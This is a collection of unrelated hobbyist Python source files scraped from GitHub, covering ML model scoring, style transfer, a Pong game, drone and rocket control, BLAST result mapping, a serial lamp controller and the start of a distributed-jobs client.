# It is the path to the model folder (./azureml-models/$MODEL_NAME/$VERSION)
# Please provide your model's folder name if there is one
print(os.listdir(os.getenv('AZUREML_MODEL_DIR')))
model_path = os.path.join(os.getenv('AZUREML_MODEL_DIR'), 'model/model.pkl')
model = joblib.load(model_path)
# called when a request is received
def run(raw_data):
# get the input data as a numpy array
print(raw_data)
data = np.array(json.loads(raw_data)['input_data']['data'])
print(data, type(data))
# get a prediction from the model
predictions = model.predict(data)
# return the predictions as any JSON serializable format
return predictions.tolist()
# if __name__ == '__main__':
# raw_data = {
# "data": {
# "columns": [
# "Pregnancies",
# "PlasmaGlucose",
# "DiastolicBloodPressure",
# "TricepsThickness",
# "SerumInsulin",
# "BMI",
# "DiabetesPedigree",
# "Age"
# ],
# "index": [1],
# "data": [
# [
# 0,148,58,11,179,39.19207553,0.160829008,45
# ]
# ]
# }
# }
# # Json should be transformed to string before sending
# json_data = json.dumps(raw_data)
# json_data
# # set the environment variable 'AZUREML_MODEL_DIR' outside of deployment just for testing the script
# os.environ['AZUREML_MODEL_DIR'] = '/mnt/batch/tasks/shared/LS_root/mounts/clusters/farbodtaymouri2/code/my-azure-ml-projects/model-deployment/src'
# init()
# preds = run(raw_data=json_data)
# print(preds) | farbodtaymouri/my-azure-ml-projects | model-deployment-online/src/model/score.py | score.py | py | 1,873 | python | en | code | 0 | github-code | 13 |
42081593576 | def solution(number, limit, power):
answer = 0
anslist = []
for i in range(1, number + 1):
n = divnum(i)
if n > limit:
anslist.append(power)
else:
anslist.append(n)
answer = sum(anslist)
return answer
def divnum(num):
    """Count the divisors of num by pairing each divisor i with num // i up to sqrt(num)."""
    cnt = 0
    sqr = int(num ** 0.5)
    if num == 1:
        cnt = 1
    else:
        if num ** 0.5 == sqr:  # perfect square: count the square root only once
            cnt += 1
            for i in range(1, sqr):
                if num % i == 0:
                    cnt += 2
        else:
            for i in range(1, sqr + 1):
                if num % i == 0:
                    cnt += 2
    return cnt
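# Hand-checked examples: divnum(1) == 1, divnum(4) == 3 (1, 2, 4) and
# divnum(6) == 4 (1, 2, 3, 6); with no count above limit=5, solution(10, 5, 2) == 27.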
print(solution(10, 5, 2)) | HotBody-SingleBungle/HBSB-ALGO | HB/pysrc/프로그래머스/레벨1/Day10(23_01_27)/기사단원의_무기.py | 기사단원의_무기.py | py | 665 | python | en | code | 0 | github-code | 13 |
41639258046 | import numpy as np
from sklearn.datasets import load_digits
from sklearn.model_selection import train_test_split
from SYF_ANN import *
normalization=16.0
# STEP 1: Load data, produce one-hot encoding of targets and split into training and testing
dig = load_digits()
onehot_target = [[1 if y==x else 0 for y in range(10)] for x in dig.target]
x_train, x_val, y_train, y_val = train_test_split(dig.data, onehot_target, test_size=0.1, random_state=20)
## STEP 2: Create network, fit the data
model = SYF_ANN(x_train/normalization, np.array(y_train))
model.fit(epochs=1500)
def get_acc(x, y):
acc = 0
for xx,yy in zip(x, y):
s = model.predict(xx)
if s == np.argmax(yy):
acc +=1
return acc/len(x)*100
## STEP 3: Benchmark Accuracy
print("Training accuracy : ", get_acc(x_train/normalization, np.array(y_train)))
print("Test accuracy : ", get_acc(x_val/normalization, np.array(y_val)))
| JuanManuelHuerta/Quantitative_Strategy | 01_ANN/v02.py | v02.py | py | 931 | python | en | code | 1 | github-code | 13 |
41908860513 | import torch
import torch.optim as optim
from torch.autograd import Variable
from torchvision.transforms import ToPILImage
from neural_style_net import ContentLoss, StyleLoss
class Solver(object):
def __init__(self, model, content_var, style_var,
content_weight=1, style_weight=1000,
num_iters=200, gpu=False):
self.model = model
self.input_var, self.content_var, self.style_var = self._prepare_input(content_var, style_var, gpu)
self.num_iters = num_iters
self.gpu = gpu
self.content_criterion = ContentLoss(weight=content_weight)
self.style_criterion = StyleLoss(weight=style_weight)
self.optimizer = optim.LBFGS([self.input_var])
@staticmethod
def _prepare_input(content_var, style_var, gpu=False):
input_tensor = content_var.data.clone()
if gpu:
input_tensor = input_tensor.cuda()
dtype = torch.cuda.FloatTensor
else:
dtype = torch.FloatTensor
input_var = Variable(input_tensor.type(dtype), requires_grad=True)
return input_var, content_var, style_var
def train(self):
content_outputs = self.model(self.content_var)
style_outputs = self.model(self.style_var)
it = [0]
while it[0] <= self.num_iters:
def closure():
self.optimizer.zero_grad()
self.input_var.data.clamp_(0, 1)
input_outputs = self.model(self.input_var)
content_loss = style_loss = 0
for name, x in input_outputs['content'].items():
y = content_outputs['content'][name]
content_loss += self.content_criterion(x, y)
for name, x in input_outputs['style'].items():
y = style_outputs['style'][name]
style_loss += self.style_criterion(x, y)
if it[0] % 50 == 0:
print('it: {}, content: {}, style: {}'.format(it[0], content_loss.data[0], style_loss.data[0]))
total_loss = content_loss + style_loss
total_loss.backward()
it[0] += 1
return total_loss
self.optimizer.step(closure)
self.input_var.data.clamp_(0, 1)
styled_image = self.input_var
if self.gpu:
styled_image = styled_image.cpu()
return ToPILImage()(styled_image.data[0])
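# A minimal usage sketch (constructing model/content_var/style_var is assumed to
# happen elsewhere, e.g. around a VGG-based network exposing the 'content' and
# 'style' outputs this class expects; the file name is hypothetical):
#   solver = Solver(model, content_var, style_var, num_iters=300, gpu=True)
#   styled = solver.train()   # returns a PIL image
#   styled.save('styled.png')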
| dfridman1/neural-style-transfer | solver.py | solver.py | py | 2,455 | python | en | code | 1 | github-code | 13 |
18978410021 | from kivy.app import App
from kivy.uix.widget import Widget
from kivy.properties import NumericProperty, ReferenceListProperty,\
ObjectProperty, StringProperty
from kivy.vector import Vector
from kivy.clock import Clock
from kivy.uix.boxlayout import BoxLayout
from kivy.uix.button import Button
from kivy.uix.label import Label
from sys import exit
class PongPaddle(Widget):
score = NumericProperty(0)
def bounce_ball(self, ball):
if self.collide_widget(ball):
vx, vy = ball.velocity
offset = (ball.center_y - self.center_y) / (self.height / 2)
bounced = Vector(-1 * vx, vy)
vel = bounced * 1.1
ball.velocity = vel.x, vel.y + offset
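            # The offset term makes the bounce angle depend on where the ball hits
            # the paddle (center -> straight back, edges -> steeper), while the 1.1
            # factor speeds the ball up slightly on every paddle hit.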
class PongBall(Widget):
velocity_x = NumericProperty(0)
velocity_y = NumericProperty(0)
velocity = ReferenceListProperty(velocity_x, velocity_y)
def move(self):
self.pos = Vector(*self.velocity) + self.pos
class PongGame(Widget):
ball = ObjectProperty(None)
player1 = ObjectProperty(None)
player2 = ObjectProperty(None)
who_wins = StringProperty("")
is_menu = StringProperty("No menu")
#def __init__(self, **kwargs):
# super(PongGame, self).__init__(**kwargs)
# self.menu = None
def serve_ball(self, vel = (4, 0)):
self.ball.center = self.center
self.ball.velocity = vel
def the_menu(self):
self.ball.velocity = 0, 0
self.menu = BoxLayout(orientation = "vertical", center_x = self.center_x, center_y = self.center_y)
lbl = Label(text = "menu")
self.menu.add_widget(lbl)
btn1 = Button(text = "Restart", on_press = self.the_resume)
btn1.bind(on_press = self.the_resume)
btn2 = Button(text = "Exit", on_press = self.get_out)
self.menu.add_widget(btn1)
self.menu.add_widget(btn2)
self.add_widget(self.menu)
    def the_resume(self, instance):
        # remember the winner before resetting, so the serve goes toward the loser
        last_winner = self.who_wins
        self.who_wins = ""
        self.player2.score = 0
        self.player1.score = 0
        self.menu.clear_widgets()
        self.remove_widget(self.menu)
        self.is_menu = "No menu"
        if last_winner == "Player 2 wins":
            vel = (-4, 0)
        else:
            vel = (4, 0)
        self.serve_ball(vel)
def get_out(self, instance):
exit()
def update(self, dt):
self.ball.move()
self.player1.bounce_ball(self.ball)
self.player2.bounce_ball(self.ball)
if (self.ball.y < 0) or (self.ball.top > self.height):
self.ball.velocity_y *= -1
if self.ball.x < self.x:
self.player2.score += 1
self.serve_ball(vel = (4, 0))
if self.ball.x > self.width:
self.player1.score += 1
self.serve_ball(vel = (-4, 0))
if self.who_wins == "":
if self.player2.score >= 1:
self.who_wins = "Player 2 wins"
elif self.player1.score >= 10:
self.who_wins = "Player 1 wins"
elif self.is_menu == "No menu":
self.is_menu = "menu"
self.the_menu()
def on_touch_move(self, touch):
if touch.x < self.width / 3:
self.player1.center_y = touch.y
if touch.x > self.width - self.width / 3:
self.player2.center_y = touch.y
class PongApp(App):
def build(self):
game = PongGame()
game.serve_ball()
Clock.schedule_interval(game.update, 1.0/60.0)
return game
if __name__ == "__main__":
PongApp().run()
| DonyTawil/MyKivy | Pong/main.py | main.py | py | 3,653 | python | en | code | 0 | github-code | 13 |
17292129823 | import time
import csv
import numpy
import Adafruit_BMP.BMP085 as BMP180
import Adafruit_ADS1x15
import smbus
power_mgmt_1 = 0x6b
power_mgmt_2 = 0x6c
bus = smbus.SMBus(0)
address = 0x1e
def read_byte(adr):
return bus.read_byte_data(address, adr)
def read_word(adr):
high = bus.read_byte_data(address, adr)
low = bus.read_byte_data(address, adr+1)
val = (high << 8) + low
return val
def read_word_2c(adr):
val = read_word(adr)
if (val >= 0x8000):
return -((65535 - val) + 1)
else:
return val
def set(property, value):
try:
f = open("/sys/class/rpi-pwm/pwm0/" + property, 'w')
f.write(value)
f.close()
except:
print("Error writing to: " + property + " value: " + value)
def current_milli_time():
    return int(round(time.time() * 1000))
def setServo(angle):
set("servo", str(angle))
def arduino_map(x, in_min, in_max, out_min, out_max):
return (x - in_min) * (out_max - out_min) // (in_max - in_min) + out_min
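# e.g. arduino_map(512, 0, 1023, 0, 255) == 127: a mid-scale ADC reading maps to
# roughly mid-scale output, mirroring Arduino's map() with integer division.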
def write_to_csv(var):
time_current = time.strftime("%H_%M_%S")
date = time.strftime("%Y_%m_%d")
filename = time_current + "EST" + date + "_data" + ".csv"
with open(filename, "wb") as fb:
c = csv.writer(fb)
c.writerow(var)
def main():
set("delayed", "0")
set("mode", "servo")
set("servo_max", "180")
set("active", "1")
    delay_period = 0.01
    t = current_milli_time()  # seed the loop timer so the first del_t is sane
    scale = 200
    bmp = BMP180.BMP085()  # BMP180 pressure/temperature sensor instance
    adc_dev = Adafruit_ADS1x15.ADS1115()  # ADS1115 ADC instance
########given#######
# state launch conditions
R = 287 # J/(kg*K)
# h_o = 0 # m
# P_o = 101300 # Pa
# L = -0.0065 # K/m
# T_o = 273 # K
# g = 9.81 # m/s^2
# state the gain of controller
kp = 2
ki = 0
kd = 1
# initialize fin position
phi = 0 # degrees
setServo(phi)
# state desired roll
r = 10 # degrees/s
while True: # infinite loop
# calculate time
t_old = t
t = current_milli_time()
del_t = t - t_old
        # calculate om_x, om_y, om_z angular velocities
# read straight from MPU-6050 gyroscope (scaled)
om_x = read_word_2c(0x43) / 131
om_y = read_word_2c(0x45) / 131
om_z = read_word_2c(0x47) / 131
# calculate roll, pitch, yaw angular positions
roll = om_x * del_t
pitch = om_y * del_t
yaw = om_z * del_t
        # calculate al_x, al_y, al_z angular accelerations
al_x = om_x / del_t
al_y = om_y / del_t
al_z = om_z / del_t
        # calculate a_x, a_y, a_z accelerations
        # read straight from ADXL377 high-g accelerometer
        a_x = arduino_map(adc_dev.read_adc(0), 0, 675, -scale, scale)
        a_y = arduino_map(adc_dev.read_adc(1), 0, 675, -scale, scale)
        a_z = arduino_map(adc_dev.read_adc(2), 0, 675, -scale, scale)
        # calculate x, y, z position (** is exponentiation; the original ^ is XOR in Python)
        x = a_x / (del_t ** 2)
        y = a_y / (del_t ** 2)
        z = a_z / (del_t ** 2)
# calculate u, v, w velocities
u = a_x / del_t
v = a_y / del_t
w = a_z / del_t
        # calculate P, T, h, rho from the BMP180 sensor instance
        P = bmp.read_pressure()
        P_o = bmp.read_sealevel_pressure()
        T = bmp.read_temperature()
        rho = P / (R * T)
        h = bmp.read_altitude()
        # h = (T/L)*((P_o/P)**(R*L/g)-1)+h_o
        # calculate error terms (single-step approximations of the integral and derivative)
        e = r - roll
        e_int = e * del_t
        e_der = e / del_t
# apply the controlled gain to the servo based on the error
phi = kp * e + ki * e_int + kd * e_der
setServo(phi)
time.sleep(delay_period)
var = [t, del_t, roll, pitch, yaw, om_x, om_y, om_z, al_x, al_y, al_z, x, y, z,
u, v, w, a_x, a_y, a_z, phi, e, P, T, rho, h]
write_to_csv(var)
# write out to .csv file
# delay to protect code from breaking.
time.sleep(0.010) # seconds
if __name__ == '__main__':
main()
| gcostigan/stab | STAB_1_code/RaspberryPiZero/stab_I.py | stab_I.py | py | 3,916 | python | en | code | 5 | github-code | 13 |
20421011399 | # -*- coding: utf-8 -*-
"""
Created on Thu May 11 20:21:41 2023
@author: alexa
"""
import pygame
from settings import *
from tile import Tile
from player import Player
from debug import *
from support import *
from random import choice
class Level:
def __init__(self):
# get the display surface
self.display_surface = pygame.display.get_surface()
# sprite group setup
self.visible_sprites = YSortCameraGroup()
self.obstacle_sprites = pygame.sprite.Group()
self.create_map()
def create_map(self):
layouts = {
'boundary': import_csv_layout('C:/Users/alexa/OneDrive/Desktop/Python-RPG-Game/map/map_FloorBlocks.csv'),
'grass': import_csv_layout('C:/Users/alexa/OneDrive/Desktop/Python-RPG-Game/map/map_Grass.csv'),
'object': import_csv_layout('C:/Users/alexa/OneDrive/Desktop/Python-RPG-Game/map/map_LargeObjects.csv'),
}
graphics = {
'grass': import_folder('C:/Users/alexa/OneDrive/Desktop/Python-RPG-Game/graphics/grass'),
'objects': import_folder('C:/Users/alexa/OneDrive/Desktop/Python-RPG-Game/graphics/objects')
}
# iterate through each item in layouts dictionary
# find x and y positions
for style, layout in layouts.items():
for row_index, row in enumerate(layout):
for column_index, column in enumerate(row):
if column != '-1':
x = column_index * TILESIZE
y = row_index * TILESIZE
if style == 'boundary':
Tile((x,y),[self.obstacle_sprites], 'invisible',)
if style == 'grass':
# select from random grass sprite
random_grass_img = choice(graphics['grass'])
Tile((x,y),[self.visible_sprites,self.obstacle_sprites], 'grass', random_grass_img)
if style == 'object':
surf = graphics['objects'][int(column)]
Tile((x,y),[self.visible_sprites,self.obstacle_sprites], 'object', surf)
# if column == 'x':
# Tile((x,y), [self.visible_sprites,self.obstacle_sprites])
# if column == 'p':
# self.player = Player((x,y), [self.visible_sprites], self.obstacle_sprites)
self.player = Player((2000,1430), [self.visible_sprites], self.obstacle_sprites)
    def run(self):
        # update and draw the game
        self.visible_sprites.custom_draw(self.player)
        self.visible_sprites.update()
class YSortCameraGroup(pygame.sprite.Group):
def __init__(self):
super().__init__()
self.display_surface = pygame.display.get_surface()
# getting the coordinates for the middle of the screen
self.half_width = self.display_surface.get_size()[0] // 2
self.half_height = self.display_surface.get_size()[1] // 2
# at the beginning, set camera to 100,200
self.camera = pygame.math.Vector2(100,200)
# self.camera = pygame.math.Vector2(0,0)
self.floor_surface = pygame.image.load('C:/Users/alexa/OneDrive/Desktop/Python-RPG-Game/graphics/tilemap/ground.png').convert()
self.floor_rect = self.floor_surface.get_rect(topleft = (0,0))
def custom_draw(self, player):
# adjust camera to center the player
self.camera.x = player.rect.centerx - self.half_width
self.camera.y = player.rect.centery - self.half_height
# placing floor before everything else
floor_offset_pos = self.floor_rect.topleft - self.camera
self.display_surface.blit(self.floor_surface, floor_offset_pos)
# display all sprites including player
for sprite in sorted(self.sprites(), key = lambda sprite: sprite.rect.centery): # key is y position of each sprite
camera_pos = sprite.rect.topleft - self.camera
self.display_surface.blit(sprite.image, camera_pos)
| alehic173/Python-RPG-Game | level.py | level.py | py | 4,509 | python | en | code | 0 | github-code | 13 |
38188821944 | from Bio import SeqIO
from Bio.Blast import NCBIWWW
from Bio.Blast import NCBIXML
from progress.bar import Bar
import pandas as pd
import geopandas
import matplotlib.pyplot as plt
import os
import re
from geopy.geocoders import Nominatim
from Bio import Entrez
import folium
def runBlast(sequence_file: str) -> list:
'''
Function to run BlastN using the given sequence file as input and return a
list of the accession numbers for 50 top hits
Parameters:
sequence_file: str -- name of DNA sequence file in FASTA format
Returns:
accession numbers for 50 top hits, as list
'''
# if the xml file which contains the blast outputs does not exist, use qblast to invoke the NCBI BLAST server over the internet and save the outputs on the local machine as an xml file:
if not (os.path.exists("results.xml")):
sequence_data = open(sequence_file).read()
bar = Bar("Processing sequence data... ")
result_handle = NCBIWWW.qblast("blastn", "nt", sequence_data) #blastn = program, "nt" = database to search against, in this case, "nt" stands for the nucleotide databse
bar.finish()
with open("results.xml","w") as save_file: # write the blastn output to a xml file
blast_results = result_handle.read()
save_file.write(blast_results)
results = open("results.xml","r")
records = list(NCBIXML.parse(results)) # parse results (xml file) into a list
one_query = records[0] #from a list to a record class that holds all BLAST output
accession_numbers = [] #create empty list to store the accession_numbers of each organism
for i in range(len(one_query.alignments)): #loop through every query to obtain the accession_number
one_hit = one_query.alignments[i]
accession_numbers.append(one_hit.accession)
return accession_numbers
def getLocationsAuthors(accession_numbers: list) -> list:
'''
Function to use Entrez to parse location and first author data for the each
of 50 top hits from BlastN output and return that data in a list
Parameters:
accession_numbers: list -- accession numbers for 50 top hits
Results:
location of institution and first author associated with 50 top hits
from BlastN output
'''
Entrez.email = input("Enter your email address (so that NCBI can contact you if there's a problem): ")
bar = Bar("Processing accession numbers in GenBank:", max = len(accession_numbers))
# create two empty lists that store the location and author informations
location_list = []
author_list = []
# parse GenBank data for every matching sequence (accession number)
for i in accession_numbers:
handle = Entrez.efetch(db = 'nucleotide', rettype = 'gb', retmode = 'text', id = i)
record = handle.read()
info = record.split("\n") # split the text file by new line
location_line = [i for i in info if i.startswith(' JOURNAL Submitted') or i.startswith('FEATURES') or i.startswith('COMMENT')] # extract lines that starts with ' JOURNAL Submitted' which contains the location information, and lines that starts with 'FEATURES' or 'COMMENT' which are the lines right after the location information
location_line_indices = []
for j in location_line:
index_number = info.index(j) #extract the index of the locations line
location_line_indices.append(index_number)
index_1 = location_line_indices[0] # first location line
index_2 = location_line_indices[-1] # last location line
location_info = info[index_1:index_2]
first_line = location_info[0]
first_line_split = first_line.split(") ") # all location lines begin with 'JOURNAL Submitted (date)', so split the line accordingly and only store the relevant information
cleaned_first_line = first_line_split[1]
location = cleaned_first_line
for h in location_info[1:]: # for the rest of the location lines
cleaned_line = h.lstrip(" ") # delete the extra spaces in front of the first letter
location += cleaned_line # append the info to the first line
# filter out all possible irrelevant information:
if "COMMENT" in location:
updated_location = location.split("COMMENT")
location = updated_location[0]
if "URL" in location:
updated_location = location.split("URL")
location = updated_location[0]
location_list.append(location)
author_line = [a for a in info if a.startswith('REFERENCE 2') or a.startswith(' TITLE Direct Submission')]
author_line_indices = []
for q in author_line:
index_number_ = info.index(q)
author_line_indices.append(index_number_)
index_reference = author_line_indices[0]
index_author = index_reference + 1 # author information starts on the next line
index_title = author_line_indices[-1] # title line is the line right after the author info
author_info = info[index_author:index_title]
try:
first_author_line = author_info[0]
first_author_split = first_author_line.split("THORS ")
cleaned_first_author_line = first_author_split[1]
author = cleaned_first_author_line
for k in author_info[1:]:
cleaned_line = k.lstrip(" ")
author += cleaned_line
author_list.append(author)
except IndexError as error: # the line reference 2 may not exist if there is only one reference
author_line_indices = []
author_line = [g for g in info if g.startswith(' AUTHORS') or g.startswith(' TITLE Direct Submission')] # search for line that starts with 'AUTHORS' instead of 'Reference 2'
for l in author_line:
index_number_ = info.index(l)
author_line_indices.append(index_number_)
index_author = author_line_indices[0]
index_title = author_line_indices[-1]
author_info = info[index_author:index_title]
first_author_line = author_info[0]
first_author_split = first_author_line.split("THORS ")
cleaned_first_author_line = first_author_split[1]
author = cleaned_first_author_line
for k in author_info[1:]:
cleaned_line = k.lstrip(" ")
author += cleaned_line
author_list.append(author)
bar.next()
location_author_list = [location_list, author_list]
bar.finish()
return location_author_list
def getAddress(locations: list) -> list:
'''
Function to use regex to pull the valid address from each of the more specific
locations parsed by GenBank
Args:
locations: list of all locations parsed from GenBank
Returns:
list of valid addresses
* Note: this regex will not work for all locations returned from GenBank,
but invalid addresses will be caught by getLatLongLists
'''
    address_list = []
    regex_ = r"([\sa-zA-Z0-9-]+,[\sa-zA-Z]+[\s0-9a-zA-Z-]+,[a-zA-Z\s]+)$" # regular expression to get the specific address that excludes the institution name and, in some cases, the street name as well
    for i in locations:
        result = re.findall(regex_, i)
        final_result = " ".join(result)
        cleaned_result = final_result.strip()
        split_address = cleaned_result.split(",")
        if len(split_address) >= 3:
            # only keep the street/city and the country; Nominatim cannot process the zip code in split_address[1]
            first, second = split_address[0], split_address[2]
            valid_address = ', '.join((first, second))
        else:
            valid_address = cleaned_result  # regex missed; pass it through so getLatLongLists can flag it
        address_list.append(valid_address)
    return address_list
def getLatLong(address: str) -> list:
'''
Function to use Nominatim from the geopy library to return the latitude and
longitude of a given address, as list
Args:
address: str -- specific address to find latitude and longitude for
Returns:
        list containing the latitude and longitude of the address
'''
geolocator = Nominatim(user_agent="dcs211_randers2/1")
location = geolocator.geocode(address)
lat = location.latitude
long = location.longitude
return [lat,long]
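# Example (requires network access; coordinates rounded):
#   getLatLong("Paris, France")  ->  [48.85..., 2.35...]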
def getLatLongLists(address_list: list) -> list:
'''
Function to get the latitude and longitude for each address and return them
as a list containing the latitude list and the longitude list
Args:
address_list: list -- list of all addresses to be processed
Returns:
list containing a list of latitudes for every address and a list of
longitudes for every address
'''
lat_list = []
long_list = []
bar = Bar("Processing each address in Nominatim:", max = len(address_list))
for i in address_list:
try:
lat_long = getLatLong(i)
except AttributeError as error:
print(" ")
print(f"Unable to fetch the following address using Nominatim: {i}")
new_address = input("Enter valid address in 'city, country' format: ") # in case a foreign street name was the problem that Nominatim cannot process the address info
try:
lat_long = getLatLong(new_address)
except AttributeError as error:
print(" ")
print("Invalid Address entered")
lat_long = ["Invalid Address", "Invalid Address"]
lat_list.append(lat_long[0])
long_list.append(lat_long[1])
bar.next()
bar.finish()
return [lat_list, long_list]
def makeDataDict(accession_numbers: list, lat_long_list: list, location_author_list: list):
'''
Function to make a dictionary with five keys: acccession numbers, authors, address, latitude, longitude
Args:
accession numbers: list -- list of all accession numbers
lat_long_list: list -- list containing a list of latitudes for every address and a list of longitudes for every address
location_author_list: list -- location of institution and author names
Returns:
dictionary containing five keys: acccession numbers, authors, address, latitude, longitude
'''
blast_dict = {'locus_name/accession_numbers': accession_numbers, 'authors': location_author_list[1], 'address': location_author_list[0], 'Latitude': lat_long_list[0], 'Longitude': lat_long_list[1]}
return blast_dict
def makeInteractive(blast_data_dict: dict):
'''
Function to make an interactive map based on the location of the institution with pop up that shows the accession number, address, and authors for each location
Args:
blast_data_dict: dict -- a dictionary containing acccession numbers, authors, address, latitude, longitude as keys
Returns:
an interactive leaflet map made using the library Folium
'''
df = pd.DataFrame(blast_data_dict)
grouped_df = df.groupby(['authors','address','Latitude','Longitude'])['locus_name/accession_numbers'].apply(', '.join).reset_index() # use group by since some of the genes (accession numbers) are discovered by the same authors
map = folium.Map([51.1657, 10.4515], tiles="Stamen Terrain", zoom_start = 2)
for index, location_info in grouped_df.iterrows():
folium.Marker([location_info["Latitude"], location_info["Longitude"]], popup= "Locus name/accession number: " + location_info["locus_name/accession_numbers"] + '<br>' + '<br>' + "Authors: " + location_info["authors"] + '<br>' + '<br>' + "Address: " + location_info["address"]).add_to(map)
map.save("interactive_map.html")
def main():
accession_numbers = runBlast("blast.fasta")
location_author_list = getLocationsAuthors(accession_numbers)
address_list = getAddress(location_author_list[0])
latlong_list = getLatLongLists(address_list)
blast_data_dict = makeDataDict(accession_numbers, latlong_list, location_author_list)
makeInteractive(blast_data_dict)
if __name__ == "__main__":
main()
| rebeccalilly/dcs211final | dcsfinal.py | dcsfinal.py | py | 12,175 | python | en | code | 0 | github-code | 13 |
21051835313 | from comdev import *
import json
import sys
# Device with serial interface (fitolamp)
class Fitolamp(Comdevice):
def __init__(self, port_name):
self.status = {"result_code": -1,
"result_text": "NoData",
"current_dtime": "NoData",
"power_state": -1,
"ch1_power": -1,
"ch2_power": -1,
"ch3_power": -1,
"start_time": "NoData",
"stop_time": "NoData",
"smooth_control": False
}
try:
Comdevice.__init__(self, port_name,
baud=115200,
parity=PARITY_NONE,
stopbits=STOPBITS_ONE,
bytesize=EIGHTBITS,
timeout=1)
except OpenPortException:
raise
def print_status(self):
for item in self.status:
print(item + ":\t" + str(self.status[item]))
# private function
def __send_request(self, request):
self.write(request.encode('utf-8'))
        response = self.read_until(CR+LF, 512)
        result = response.decode("utf-8")
try:
parsed = json.loads(result)
except json.JSONDecodeError:
print("JSONDecodeError")
print(sys.exc_info()[:2])
return False
else:
# update settings values
for item in self.status:
self.status[item] = parsed[item]
if parsed["result_code"] == 0 and parsed["result_text"] == "OK" :
return True
else:
return False
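    # A request/response exchange over the serial line looks roughly like this
    # (values illustrative; the shape follows the setters and status fields above):
    #   -> {"start_time": "18:00"}\r\n
    #   <- {"result_code": 0, "result_text": "OK", "power_state": 1, ...}\r\n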
def get_status(self):
request = '{}\r\n'
return "OK" if self.__send_request(request) else self.status["result_text"]
def set_start_time(self, value):
request = json.dumps({"start_time":str(value)}) + "\r\n"
return "OK" if self.__send_request(request) else self.status["result_text"]
def set_stop_time(self, value):
request = json.dumps({"stop_time":str(value)}) + "\r\n"
return "OK" if self.__send_request(request) else self.status["result_text"]
def set_current_time(self, value):
request = json.dumps({"current_time":str(value)}) + "\r\n"
return "OK" if self.__send_request(request) else self.status["result_text"]
def set_red_power(self, value):
request = json.dumps({"ch2_power":str(value)}) + "\r\n"
return "OK" if self.__send_request(request) else self.status["result_text"]
def set_blue_power(self, value):
request = json.dumps({"ch3_power":str(value)}) + "\r\n"
return "OK" if self.__send_request(request) else self.status["result_text"]
def set_white_power(self, value):
request = json.dumps({"ch1_power":str(value)}) + "\r\n"
return "OK" if self.__send_request(request) else self.status["result_text"]
def set_smooth_control(self, value):
request = json.dumps({"smooth_control":str(value)}) + "\r\n"
return "OK" if self.__send_request(request) else self.status["result_text"]
def set_all(self): pass
def close(self):
Comdevice.close(self)
# Self-Test
if __name__ == "__main__":
for port in get_avail_ports():
print(port)
fitolamp = Fitolamp("COM8")
fitolamp.get_status()
print("Set current time:\t" + fitolamp.set_current_time("17:00"))
print("Set start time:\t" + fitolamp.set_start_time("18:00"))
fitolamp.print_status()
fitolamp.close()
print("Test finished, Port closed")
| MikhailBerezhanov/FLC-01 | gui/flc_com.py | flc_com.py | py | 3,727 | python | en | code | 0 | github-code | 13 |
22006876685 | import keyboardModule as kb
from djitellopy import tello
from time import sleep
import cv2, time
import rospy
import sys,os
from std_msgs.msg import String,Float32MultiArray, Int32MultiArray,Bool
from sensor_msgs.msg import Image
from cv_bridge import CvBridge
"""
if kb.getKey("q"):
mytello.land()
elif kb.getKey("z"):
mytello.takeoff()
"""
#mytello = tello.Tello()
#mytello.connect()
#print('123',mytello)
#print(type(mytello))
#print("目前電池電量: {}%".format(mytello.get_battery()))
#camera = False
#mytello.streamoff()
#kb.init()
pub_img = rospy.Publisher('frame_img', Int32MultiArray,queue_size=10)
def callback(data):
val =data.data
print(data.data)
if val[4]==1:
mytello.takeoff()
if val[5]==1:
mytello.land()
#rospy.loginfo(rospy.get_caller_id() + ' I heard %s', data.data)
lr, fb, ud, yv = int(val[0]), int(val[1]), int(val[2]), int(val[3])
mytello.send_rc_control(lr, fb, ud, yv)
def camera(data):
val = data.data
print(data.data)
if val[0]:
if not mytello.stream_on:
#mytello.streamoff()
mytello.streamon()
img = mytello.get_frame_read().frame
img = cv2.resize(img, (360, 240))
cv2.imshow("Mytello", img)
cv2.waitKey(1)
a = Int32MultiArray(data = img.reshape(-1).tolist())
pub_img.publish(a)
sleep(0.05)
else:
mytello.streamoff()
cv2.destroyAllWindows()
if not val[0]:
if mytello.stream_on:
img = mytello.get_frame_read().frame
img = cv2.resize(img, (360, 240))
cv2.imshow("Mytello", img)
cv2.waitKey(1)
a = Int32MultiArray(data = img.reshape(-1).tolist())
pub_img.publish(a)
sleep(0.05)
if val[1] and mytello.stream_on:
cv2.imwrite(r"saveImg/{}.jpg".format(time.time()), img)
sleep(0.5)
def over(data):
ov = data.data
print(data.data)
if ov:
print("omg")
if mytello.stream_on:
mytello.streamoff()
if mytello.is_flying:
mytello.land()
#os._exit(0)
def listener():
# In ROS, nodes are uniquely named. If two nodes with the same
# name are launched, the previous one is kicked off. The
# anonymous=True flag means that rospy will choose a unique
# name for our 'listener' node so that multiple listeners can
# run simultaneously.
rospy.init_node('listener', anonymous=True)
#rate = rospy.Rate(10)
#timer = rospy.Timer(rospy.Duration(1),frame_callback)
#rospy.spin()
#timer.shutdown()
#while not rospy.is_shutdown():
rospy.Subscriber('over',Bool,over)
rospy.Subscriber('move', Float32MultiArray, callback)
rospy.Subscriber('camera',Int32MultiArray,camera)
    # the two lines below read a frame before any stream is started and the
    # result was never used, so they are left commented out:
    # img = mytello.get_frame_read().frame
    # img = cv2.resize(img, (360, 240))
    rospy.spin()
#rate.sleep()
if __name__ == '__main__':
mytello = tello.Tello()
mytello.connect()
print("目前電池電量: {}%".format(mytello.get_battery()))
listener()
| oscar50513/AI_project | drown_ws/control_node.py | control_node.py | py | 3,123 | python | en | code | 0 | github-code | 13 |
41670160570 | __version__ = 10
import urllib.request
import os
import sys
import zipfile
import time
from optparse import OptionParser
import platform
import shutil
import json
import subprocess
import http.client, mimetypes
import tempfile
print("\nSimple Jobs Distribution Framework\nversion: {}, platform: {}".format(__version__, platform.system()))
# host must include the protocol (http://, https:// ...)
SERVER = ""
system = platform.system()
zipfiles_mem = []
jobs_count = 0
def wait():
print("\nThe Simple Distributed Computing Platform client will exit in 15 seconds...\n")
time.sleep(15)
class unzip:
def __init__(self, verbose = False, percent = 10):
self.verbose = verbose
self.percent = percent
def extract(self, file, dir):
if not dir.endswith(':') and not os.path.exists(dir):
os.mkdir(dir)
zf = zipfile.ZipFile(file)
# create directory structure to house files
self._createstructure(file, dir)
num_files = len(zf.namelist())
percent = self.percent
divisions = 100 / percent
perc = int(num_files / divisions)
# extract files to directory structure
for i, name in enumerate(zf.namelist()):
if self.verbose == True:
print( "Extracting %s" % name)
elif perc > 0 and (i % perc) == 0 and i > 0:
